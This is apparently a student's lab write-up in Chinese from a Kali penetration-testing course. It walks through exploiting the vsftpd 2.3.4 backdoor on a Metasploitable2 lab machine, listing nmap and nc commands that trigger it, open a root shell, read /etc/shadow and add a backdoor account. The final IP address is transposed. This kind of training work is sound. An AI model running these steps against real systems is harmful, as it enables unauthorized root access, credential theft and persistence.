kali渗透测试 2021-11-01
课程内容
漏洞扫描
0day 还没有补丁的安全漏洞
ARP欺骗
FTP/HTTP协议 明文传输
作业
一、漏洞渗透测试
1、靶机安装easy file sharing server(efssetup_2018.zip)
2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100
3、利用该漏洞,使得靶机运行计算器。P116-119
二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
P121-123;140-145
给出WalkThrough WriteUp
实验
注:本次实验仅作测试 不涉及任何资产损失 一切操作都是在内网运行 本人严格遵守法律
一.笑脸漏洞
vsftpd v2.3.4
在 str.c 中出现一行与程序无关的代码
vsf_sysutil_extra(): 打开6200端口
Metasploitable2:
ifconfig
192.168.220.144
kali:
nmap 192.168.220.144/24
这里的 24 理解为 255.255.255.0 子网掩码的长度
nmap -p 6200 192.168.220.144
指定端口 6200
扫描6200
开始复现漏洞
nc 192.168.220.144 21
user a:) [这里末尾要是一个 :)]
pass 11
就成功打开了 靶机上的 6200 端口
然后 nc 192.168.220.144 6200
发现成功连接上了靶机系统
这是开发者留的一个后门
并且还是个大后门(root)
如图所示 我们使用
cat /etc/shadow
查看系统的账户
我们试着 添加一个账户
adduser test4
看看靶机
cat /etc/shadow
已经成功创建了 一个test4后门账号
自动化脚本
nmap --script ftp-vsftpd-backdoor 192.168.144.220